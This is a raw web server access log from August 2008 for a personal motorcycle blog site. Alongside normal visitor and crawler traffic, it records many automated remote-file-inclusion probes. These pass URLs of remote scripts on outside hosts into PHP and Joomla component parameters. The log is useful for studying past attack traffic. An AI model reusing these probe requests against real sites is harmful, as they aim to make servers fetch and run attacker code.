72.55.148.240 - - [12/Aug/2008:10:05:45 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://misindo.com/~infocomp/images/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:05:54 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:05:55 -0700] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:05:56 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:06:02 -0700] "GET /logs/access.log//errors.php?error=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:06:02 -0700] "GET //errors.php?error=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:06:02 -0700] "GET /logs//errors.php?error=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:06:02 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:06:06 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.17.183 - - [12/Aug/2008:10:06:20 -0700] "GET /logs/access_070911.log HTTP/1.0" 200 86699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:06:25 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:06:29 -0700] "GET /logs/access_080324.log//components/com_flyspray/startdown.php?file=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:06:30 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:06:45 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:06:55 -0700] "GET /logs/access_080312.log//?p=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:06:58 -0700] "GET //?p=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18383 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:06:59 -0700] "GET /logs//?p=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:03 -0700] "GET /logs/access_080312.log//?pag=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.246.129.196 - - [12/Aug/2008:10:07:04 -0700] "GET / HTTP/1.1" 200 18257 "-" "Mozilla/4.0" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:05 -0700] "GET //?pag=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.811" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:05 -0700] "GET / HTTP/1.1" 200 18257 "http://www.st-owners.com/forums/showthread.php?t=40390" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:05 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1013 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:05 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:05 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:05 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:05 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:07:05 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:05 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:05 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:05 -0700] "GET /logs//?pag=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:05 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:07:06 -0700] "GET /phphtml.php?htmlclass_path=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/xmlrpc.php HTTP/1.1" 200 59 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 14330 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:07:06 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:07 -0700] "GET /blog/xmlrpc.php?rsd HTTP/1.1" 200 839 "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:07 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:07 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:07 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:08 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:08 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:08 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:08 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:08 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 304 - "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:09 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:09 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&6 HTTP/1.1" 200 19014 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:10 -0700] "GET /logs/access_080312.log//?page=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:10 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&250 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:11 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0048.jpg HTTP/1.1" 200 344028 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:11 -0700] "GET //?page=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18389 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:12 -0700] "GET /logs//?page=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:13 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0154.jpg HTTP/1.1" 200 344712 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:14 -0700] "GET /logs/access_080312.log//?pag=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:14 -0700] "GET /logs/access_080312.log//?p=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:15 -0700] "GET //?p=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:15 -0700] "GET /logs//?p=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:15 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:15 -0700] "GET //?pag=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:16 -0700] "GET /logs//?pag=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:07:16 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:07:17 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:07:18 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:07:18 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:23 -0700] "GET /logs/access_080312.log//?page=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:07:24 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:07:24 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:24 -0700] "GET //?page=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18389 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:24 -0700] "GET /logs//?page=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:26 -0700] "GET /logs/access_080404.log//?p=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:27 -0700] "GET /logs/access_080404.log//?pag=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:27 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:28 -0700] "GET /logs/access_080404.log//?pag=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:28 -0700] "GET /logs/access_080404.log//?p=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
129.176.151.10 - - [12/Aug/2008:10:07:29 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:07:31 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:07:32 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:33 -0700] "GET /logs/access_080404.log//?page=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:36 -0700] "GET /logs/access_080404.log//?page=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:07:45 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:49 -0700] "GET /logs/access_080312.log//?pg=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:50 -0700] "GET //?pg=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18385 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:07:51 -0700] "GET /logs//?pg=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:08:01 -0700] "GET /logs/access_080312.log//?pg=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:08:02 -0700] "GET //?pg=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:08:03 -0700] "GET /logs//?pg=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 200 60288 "-" "libwww-perl/5.811" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:08:05 -0700] "GET /logs//atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:08:08 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.17.183 - - [12/Aug/2008:10:08:08 -0700] "GET /bikes/dteel/CreSTOC08/?M=A HTTP/1.0" 200 6009 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:08:09 -0700] "GET //atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:08:09 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:08:10 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:08:10 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.60.72.69 - - [12/Aug/2008:10:08:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:08:14 -0700] "GET /logs/access_080404.log//?pg=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.199.250.122 - - [12/Aug/2008:10:08:18 -0700] "GET /logs/access_080404.log//?pg=http://www.geocities.com/himar84/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:08:34 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:10:08:34 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:08:43 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:08:45 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:08:57 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [12/Aug/2008:10:09:20 -0700] "GET /logs/access_080122.log//components/com_simpleboard/image_upload.php?sbp=http://www1.myweb.ge/V7ID.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.19.213 - - [12/Aug/2008:10:09:40 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://dj-kelly.com/guestbook////log/idscan7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.213 - - [12/Aug/2008:10:09:41 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://dj-kelly.com/guestbook////log/idscan7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:10:09:41 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:09:43 -0700] "GET /logs/access_080229.log//modules/xfsection/modify.php?dir_module=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:09:43 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Aug/2008:10:09:43 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:10:09:45 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
68.178.171.49 - - [12/Aug/2008:10:09:52 -0700] "GET /index.php?pagina=http://www.xsenhalol.xpg.com.br/ylaslas?\r HTTP/1.0" 200 18367 "-" "Mozilla/5.0" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:10:10:20 -0700] "GET //atom.php5?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
